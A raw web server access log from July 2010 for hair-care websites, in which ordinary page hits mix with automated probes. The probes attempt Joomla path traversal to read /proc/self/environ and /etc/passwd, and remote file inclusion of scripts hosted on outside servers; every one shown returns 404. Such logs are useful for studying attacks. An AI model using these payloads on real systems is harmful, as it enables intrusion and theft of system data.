71.193.26.57 - - [12/Jul/2010:07:40:37 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
173.19.68.151 - - [12/Jul/2010:07:40:45 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
173.22.157.60 - - [12/Jul/2010:07:41:14 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
77.76.25.8 - - [12/Jul/2010:07:41:24 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
203.198.126.43 - - [12/Jul/2010:07:41:29 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
77.92.159.102 - - [12/Jul/2010:07:42:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
69.242.209.71 - - [12/Jul/2010:07:42:22 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
189.89.70.103 - - [12/Jul/2010:07:42:25 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
220.178.41.50 - - [12/Jul/2010:07:42:41 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
173.172.150.24 - - [12/Jul/2010:07:42:47 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
174.64.163.190 - - [12/Jul/2010:07:42:51 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
174.64.163.190 - - [12/Jul/2010:07:42:53 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
91.212.226.210 - - [12/Jul/2010:07:45:02 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "freehairsecrets.com"
91.212.226.210 - - [12/Jul/2010:07:45:02 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "freehairsecrets.com"
195.191.40.23 - - [12/Jul/2010:07:46:36 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.freehairsecrets.com"
69.175.62.242 - - [12/Jul/2010:07:47:16 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.175.62.242 - - [12/Jul/2010:07:47:16 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.175.62.242 - - [12/Jul/2010:07:47:16 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
78.159.121.188 - - [12/Jul/2010:07:56:07 -0700] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "growlonghairfast.com"
78.159.121.188 - - [12/Jul/2010:07:56:07 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "growlonghairfast.com"
200.195.246.74 - - [12/Jul/2010:07:58:29 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:07:58:29 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:07:58:31 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:07:58:37 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
200.195.246.74 - - [12/Jul/2010:07:58:48 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:07:58:48 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:07:58:49 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:07:58:56 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:07:59:01 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:07:59:05 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:07:59:51 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:07:59:54 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:07:59:54 -0700] "GET /logs/access_100215.log%20%20//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:07:59:54 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
200.195.246.74 - - [12/Jul/2010:07:59:55 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:00:03 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:00:07 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:00:08 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:00:16 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
188.127.248.175 - - [12/Jul/2010:08:00:23 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.136.148.25 - - [12/Jul/2010:08:00:25 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
89.136.148.25 - - [12/Jul/2010:08:00:25 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
72.3.233.173 - - [12/Jul/2010:08:00:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:08:00:28 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:08:00:28 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.15.238.210 - - [12/Jul/2010:08:00:41 -0700] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
188.127.248.175 - - [12/Jul/2010:08:00:42 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:08:00:44 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:08:00:47 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.195.246.74 - - [12/Jul/2010:08:00:58 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:00:59 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:00:59 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:01:59 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:02:05 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:02:06 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:02:26 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:02:26 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:02:29 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:02:41 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:02:42 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:02:43 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
216.15.238.210 - - [12/Jul/2010:08:02:46 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:02:50 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:02:53 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:02:54 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:03 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:05 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:06 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:11 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:19 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:24 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:28 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:30 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:33 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:36 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:36 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:37 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:38 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:38 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:03:40 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:00 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:01 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:02 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:06 -0700] "GET /logs/access.log/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:07 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:10 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:16 -0700] "GET /logs/index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:39 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:40 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:41 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:47 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:47 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:49 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:50 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:51 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:52 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:52 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:53 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:54 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
200.195.246.74 - - [12/Jul/2010:08:04:56 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
